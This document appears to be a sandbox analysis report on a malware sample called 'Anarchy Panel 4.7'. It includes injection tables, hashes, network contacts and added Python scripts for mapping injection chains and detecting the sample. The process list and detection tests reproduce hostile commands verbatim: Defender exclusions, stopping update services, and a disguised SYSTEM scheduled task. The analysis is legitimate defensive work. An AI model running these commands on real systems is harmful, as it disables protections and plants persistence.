Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3220 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3220 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4632 wrote to memory of 2240 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe
PID 4632 wrote to memory of 2240 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe
PID 4632 wrote to memory of 4860 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe
PID 4632 wrote to memory of 4860 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe
PID 4632 wrote to memory of 448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe
PID 4632 wrote to memory of 448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe
PID 4632 wrote to memory of 448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe
PID 4632 wrote to memory of 2376 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe
PID 4632 wrote to memory of 2376 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe
PID 4632 wrote to memory of 2376 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe
PID 384 wrote to memory of 3276 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 384 wrote to memory of 3276 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 384 wrote to memory of 5004 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 384 wrote to memory of 5004 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 384 wrote to memory of 3528 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 384 wrote to memory of 3528 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 384 wrote to memory of 4164 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 384 wrote to memory of 4164 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 384 wrote to memory of 4424 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 384 wrote to memory of 4424 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4860 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe C:\Windows\System32\dialer.exe
PID 5040 wrote to memory of 1608 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 5040 wrote to memory of 1608 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 5040 wrote to memory of 2296 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 5040 wrote to memory of 2296 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4456 wrote to memory of 588 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\winlogon.exe
PID 4456 wrote to memory of 676 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\lsass.exe
PID 4456 wrote to memory of 952 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\svchost.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 4456 wrote to memory of 316 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\dwm.exe
PID 4456 wrote to memory of 436 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\svchost.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 448 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe C:\Windows\system32\certreq.exe
PID 448 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe C:\Windows\system32\certreq.exe
PID 448 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe C:\Windows\system32\certreq.exe
PID 4456 wrote to memory of 752 N/A C:\Windows\System32\dialer.exe C:\Windows\System32\svchost.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 448 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe C:\Windows\system32\certreq.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 5040 wrote to memory of 784 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 5040 wrote to memory of 784 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 4456 wrote to memory of 1064 N/A C:\Windows\System32\dialer.exe C:\Windows\System32\svchost.exe
PID 4456 wrote to memory of 1092 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\svchost.exe
PID 5040 wrote to memory of 3524 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 5040 wrote to memory of 3524 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 4456 wrote to memory of 1104 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\svchost.exe
PID 4456 wrote to memory of 1180 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\svchost.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
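The WriteProcessMemory table above is noisy because a parent process writes into every child it creates (cmd.exe into sc.exe, for example), so the rows only become meaningful once they are turned into a graph and filtered by which trust boundary each write crosses. The script below is an added example, not part of the sandbox report: it parses a subset of the rows copied from the table above, flags writes into or out of SYSTEM-integrity processes, and walks the writer links back to the root so the injection chain can be read off. The PROTECTED set, the user-writable path markers and the severities are my own choices, not the sandbox's.

```python
import re

# Rows copied from the "Suspicious use of WriteProcessMemory" table above
# (a representative subset; repeated rows are kept because the sandbox logs
# one row per WriteProcessMemory call).
SAMPLE_ROWS = r"""
PID 3220 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4632 wrote to memory of 4860 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe
PID 384 wrote to memory of 3276 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 384 wrote to memory of 3276 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 4860 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe C:\Windows\System32\dialer.exe
PID 4456 wrote to memory of 588 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\winlogon.exe
PID 4456 wrote to memory of 676 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\lsass.exe
PID 4456 wrote to memory of 952 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\svchost.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 4456 wrote to memory of 316 N/A C:\Windows\System32\dialer.exe C:\Windows\system32\dwm.exe
PID 676 wrote to memory of 2432 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
"""

# Non-greedy first path, greedy second: paths may contain spaces but a new
# path always starts with a drive letter and a backslash.
ROW = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A ([A-Za-z]:\\.*?) ([A-Za-z]:\\.*)$")

# SYSTEM-integrity processes a user-mode program must never write into.
# A write *from* one of them is just as bad: it already hosts foreign code.
PROTECTED = {"lsass.exe", "winlogon.exe", "csrss.exe", "services.exe",
             "wininit.exe", "smss.exe", "svchost.exe", "dwm.exe"}
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def parse_rows(text: str) -> list[tuple[int, int, str, str]]:
    """Parse rows into unique (src_pid, dst_pid, src_path, dst_path) edges, order preserved."""
    edges: dict[tuple[int, int, str, str], None] = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            src, dst, sp, dp = m.groups()
            edges.setdefault((int(src), int(dst), sp, dp), None)
    return list(edges)


def classify(edges) -> list[tuple[int, int, str, str]]:
    """(src, dst, severity, reason) for each edge that crosses a trust boundary."""
    findings = []
    for src, dst, sp, dp in edges:
        sb, db = basename(sp).lower(), basename(dp).lower()
        if db in PROTECTED:
            findings.append((src, dst, "high", f"{sb} wrote into protected process {db}"))
        elif sb in PROTECTED:
            findings.append((src, dst, "high", f"protected process {sb} is injecting into {db}"))
        elif any(k in sp.lower() for k in USER_WRITABLE) and dp.lower().startswith("c:\\windows\\"):
            # Could be a plain spawn; corroborate with SetThreadContext before calling it hollowing.
            findings.append((src, dst, "medium", f"{sb} (user-writable path) wrote into Windows binary {db}"))
    return findings


def chain_to(edges, pid: int) -> list[str]:
    """Follow writer links backwards from pid to the root; image basenames, root first."""
    writer: dict[int, int] = {}
    names: dict[int, str] = {}
    for src, dst, sp, dp in edges:
        writer.setdefault(dst, src)
        names[src] = basename(sp)
        names[dst] = basename(dp)
    chain, seen = [pid], {pid}
    while chain[-1] in writer and writer[chain[-1]] not in seen:
        chain.append(writer[chain[-1]])
        seen.add(chain[-1])
    return [names[p] for p in reversed(chain)]


if __name__ == "__main__":
    edges = parse_rows(SAMPLE_ROWS)
    for src, dst, sev, why in classify(edges):
        print(f"[{sev}] {src} -> {dst}: {why}")
    print(" -> ".join(chain_to(edges, 676)))
```

On the rows above this yields five high findings (dialer.exe into winlogon.exe, lsass.exe, svchost.exe and dwm.exe, then lsass.exe into sysmon.exe), two medium ones (the sample into powershell.exe, aqcorpk2.zlc1.exe into dialer.exe) and nothing for cmd.exe spawning sc.exe. The chain for lsass.exe reads Anarchy Panel.exe, powershell.exe, aqcorpk2.zlc1.exe, dialer.exe, lsass.exe, which is the same sequence the SetThreadContext signature on dialer.exe points at.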

Processes

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe

"C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe

"C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe"

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe

"C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe"

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe

"C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe"

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe

"C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fratkkd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineTCP' /tr '''C:\Program Files\Google\Chrome\updatestarter.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updatestarter.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineTCP' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 428 -p 588 -ip 588

C:\Windows\system32\certreq.exe

"C:\Windows\system32\certreq.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 588 -s 764

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 468 -p 316 -ip 316

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 316 -s 3892

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 528 -p 316 -ip 316

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe
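The process list above contains the command lines a detection engineer would want rules for: sc stop against the Windows Update services (UsoSvc, WaaSMedicSvc, wuauserv, bits, dosvc), powercfg zeroing every sleep and hibernate timeout, Add-MpPreference -ExclusionPath, an encoded PowerShell launch, a scheduled task whose name mimics Google's updater, and the rundll32 ordinal-#1 loads from %TEMP% seen in the plugin detonations. The rule set below is an added example written for this report, not the sandbox's own signatures: the first six events are command lines copied from this page (the Base64 blob is truncated and the PIDs other than 384, 5040 and 4632 are placeholders), the last three are constructed benign look-alikes that must not fire. The allowlist of genuine Google task names (GoogleUpdateTaskMachineCore and GoogleUpdateTaskMachineUA), the -e/-ec/-enc shorthand handling and the severities are my assumptions.

```python
import re

# (name, severity, pattern); order determines tag order in the output.
RULES = [
    ("disable_update_services", "high",
     re.compile(r"\bsc(?:\.exe)?\s+stop\s+(?:UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b", re.I)),
    ("disable_sleep", "medium",
     re.compile(r"\bpowercfg(?:\.exe)?\s+/x\s+-(?:hibernate|standby)-timeout-(?:ac|dc)\s+0\b", re.I)),
    ("defender_exclusion", "high",
     re.compile(r"\bAdd-MpPreference\b.*?-ExclusionPath\b", re.I)),
    ("encoded_powershell", "medium",
     re.compile(r'powershell(?:\.exe)?"?\s+.*?-(?:EncodedCommand|enc|ec|e)\b', re.I)),
    # Google's own tasks are ...Core and ...UA; anything else with the prefix is impersonation.
    ("fake_google_update_task", "high",
     re.compile(r"GoogleUpdateTaskMachine(?!(?:Core|UA)\b)\w+")),
    ("rundll32_temp_ordinal", "medium",
     re.compile(r'\brundll32(?:\.exe)?\s+"?[^"]*\\(?:Temp|AppData)\\[^"]*\.dll"?\s*,\s*#\d+', re.I)),
    ("comment_padding", "low",
     re.compile(r"<#\w+#>")),
]
WEIGHT = {"high": 3, "medium": 2, "low": 1}
SEVERITY = {name: sev for name, sev, _ in RULES}

# (pid, command line). First six copied from this report, last three constructed.
EVENTS = [
    (384, r"C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc"),
    (5040, r"C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0"),
    (2000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"),
    (4632, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUA..."'),
    (2001, r"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fratkkd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineTCP' /tr '''C:\Program Files\Google\Chrome\updatestarter.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updatestarter.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineTCP' -User 'System' -RunLevel 'Highest' -Force; }"""),
    (3000, r'rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\G3nl0mDcABnDuZ.dll",#1'),
    (9001, r"sc query wuauserv"),
    (9002, r"schtasks /query /tn GoogleUpdateTaskMachineUA"),
    (9003, r"powershell.exe -NoProfile -Command Get-Date"),
]


def match_rules(cmdline: str) -> list[str]:
    """Names of every rule that fires on one command line."""
    return [name for name, _sev, rx in RULES if rx.search(cmdline)]


def score(tags: list[str]) -> int:
    return sum(WEIGHT[SEVERITY[t]] for t in tags)


def triage(events) -> list[tuple[int, list[str], int]]:
    """(pid, tags, score) for every event that fired, highest score first."""
    hits = []
    for pid, cmdline in events:
        tags = match_rules(cmdline)
        if tags:
            hits.append((pid, tags, score(tags)))
    hits.sort(key=lambda h: -h[2])
    return hits


if __name__ == "__main__":
    for pid, tags, s in triage(EVENTS):
        print(f"pid {pid} score {s}: {', '.join(tags)}")
```

Each rule is deliberately narrow: sc stop only counts against the update-related services this chain disables, powercfg only when a timeout is set to 0, and the task rule fires on the prefix Google actually uses while excluding the two real task names, so a legitimate updater on the host does not trip it. The -e shorthand is matched as a whole word so -ExclusionPath and -Execute are not mistaken for it.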

Network

Country Destination Domain Proto
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp

Files

memory/4632-133-0x0000000002D60000-0x0000000002D96000-memory.dmp

memory/4632-134-0x0000000074980000-0x0000000075130000-memory.dmp

memory/4632-135-0x0000000002CD0000-0x0000000002CE0000-memory.dmp

memory/4632-136-0x0000000002CD0000-0x0000000002CE0000-memory.dmp

memory/4632-137-0x0000000005940000-0x0000000005F68000-memory.dmp

memory/4632-138-0x00000000056B0000-0x00000000056D2000-memory.dmp

memory/4632-139-0x0000000005FE0000-0x0000000006046000-memory.dmp

memory/4632-140-0x0000000006050000-0x00000000060B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3cy31vnb.nyd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4632-150-0x0000000006680000-0x000000000669E000-memory.dmp

memory/4632-151-0x0000000002CD0000-0x0000000002CE0000-memory.dmp

memory/4632-152-0x000000007FBB0000-0x000000007FBC0000-memory.dmp

memory/4632-153-0x0000000007880000-0x00000000078B2000-memory.dmp

memory/4632-154-0x00000000707A0000-0x00000000707EC000-memory.dmp

memory/4632-164-0x0000000006C50000-0x0000000006C6E000-memory.dmp

memory/4632-165-0x0000000007FF0000-0x000000000866A000-memory.dmp

memory/4632-166-0x00000000079B0000-0x00000000079CA000-memory.dmp

memory/4632-167-0x0000000007A00000-0x0000000007A0A000-memory.dmp

memory/4632-168-0x0000000007C50000-0x0000000007CE6000-memory.dmp

memory/4632-169-0x0000000074980000-0x0000000075130000-memory.dmp

memory/4632-170-0x0000000007BD0000-0x0000000007BDE000-memory.dmp

memory/4632-171-0x0000000002CD0000-0x0000000002CE0000-memory.dmp

memory/4632-172-0x0000000007C20000-0x0000000007C3A000-memory.dmp

memory/4632-173-0x0000000007C10000-0x0000000007C18000-memory.dmp

memory/4632-174-0x0000000002CD0000-0x0000000002CE0000-memory.dmp

memory/4632-175-0x0000000007EC0000-0x0000000007EE2000-memory.dmp

memory/4632-176-0x0000000008C20000-0x00000000091C4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe

MD5 17d1a593f7481f4a8cf29fb322d6f472
SHA1 a24d8e44650268f53ca57451fe564c92c0f2af35
SHA256 f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c
SHA512 8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe

MD5 17d1a593f7481f4a8cf29fb322d6f472
SHA1 a24d8e44650268f53ca57451fe564c92c0f2af35
SHA256 f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c
SHA512 8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

memory/4632-189-0x0000000002CD0000-0x0000000002CE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc0.exe

MD5 17d1a593f7481f4a8cf29fb322d6f472
SHA1 a24d8e44650268f53ca57451fe564c92c0f2af35
SHA256 f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c
SHA512 8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc1.exe

MD5 c4b8578d2354c38613669b1c82a08ccb
SHA1 f6b0353977350e42d6a4f09f887c41b51c1adf6e
SHA256 3297bc041d9579715b6724204059f5cdc0bcfcbfaa2548b8daaf7ad90e0e82d2
SHA512 903d6520c0bd968ca7854bde2edce0c0191592d29050762b00c35c8d25c28304100955cf9ba2956f2c8905f572c7ea67c0b2494622745e82a8a5511146ea9a73

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc2.exe

MD5 c3ec8ce62adc05301e89a5db1694d79d
SHA1 033a64fd7f407d319dd660e9f9ba49851b9229a1
SHA256 97cc46d4f3ed56b872bd8cd8a7f35a6a3128b898bb8a5b03c36c4f8d29f0f9cf
SHA512 cebaa16485bfd01081b727375a458f9a817a5295a157adffbf5ec4f76697caa8bc6d8f0de5909dab98f6948d085f82ebbab479bfb3d3c2a285b3f422139baf6d

C:\Users\Admin\AppData\Local\Temp\aqcorpk2.zlc3.exe

MD5 27543547fa480422e56e0b4cdbb09488
SHA1 35f701bc2c43a308098251d9d413e64e52176fc2
SHA256 9664dde8876d8c83375bb227bfebabb53acbbd4920a88acf100ec7ca6c0bc664
SHA512 a2efa21a27ef67df01578eb4903b8adc852fa682dc168512b4547536d67d801cad0a25af570e0d085f9d4b340a569c964a4cead05e3f8114b5f2b2d659b7a4b2

memory/4632-215-0x0000000074980000-0x0000000075130000-memory.dmp

memory/448-216-0x0000000002190000-0x0000000002197000-memory.dmp

memory/448-217-0x0000000002230000-0x0000000002630000-memory.dmp

memory/448-218-0x0000000002230000-0x0000000002630000-memory.dmp

memory/2688-219-0x00007FFC2B8B0000-0x00007FFC2C371000-memory.dmp

memory/2688-220-0x0000023FA6610000-0x0000023FA6620000-memory.dmp

memory/448-221-0x0000000002230000-0x0000000002630000-memory.dmp

memory/2688-222-0x0000023FA6610000-0x0000023FA6620000-memory.dmp

memory/448-223-0x0000000002230000-0x0000000002630000-memory.dmp

memory/2688-233-0x0000023FA87D0000-0x0000023FA87F2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bf5ac66a6a0b2e5a158d989669ea5202
SHA1 56eaeb9500ac19e9006c5f5cd96f6ad648e92612
SHA256 70a48a9f41e18cb879549fc403fe7080aab5213506fd00bbd0b34ea3f68ac408
SHA512 9732bd97c4a2984bed99b1dcb46c685eca1bcc5c88c92f7ba39998f468e00240ad3e8f65f11f5e477a2472bef0ab1080804e227c4dc177d36744b5e6a618d3e1

memory/2688-235-0x0000023FA6610000-0x0000023FA6620000-memory.dmp

memory/2688-238-0x00007FFC2B8B0000-0x00007FFC2C371000-memory.dmp

memory/4456-241-0x00007FFC4A430000-0x00007FFC4A625000-memory.dmp

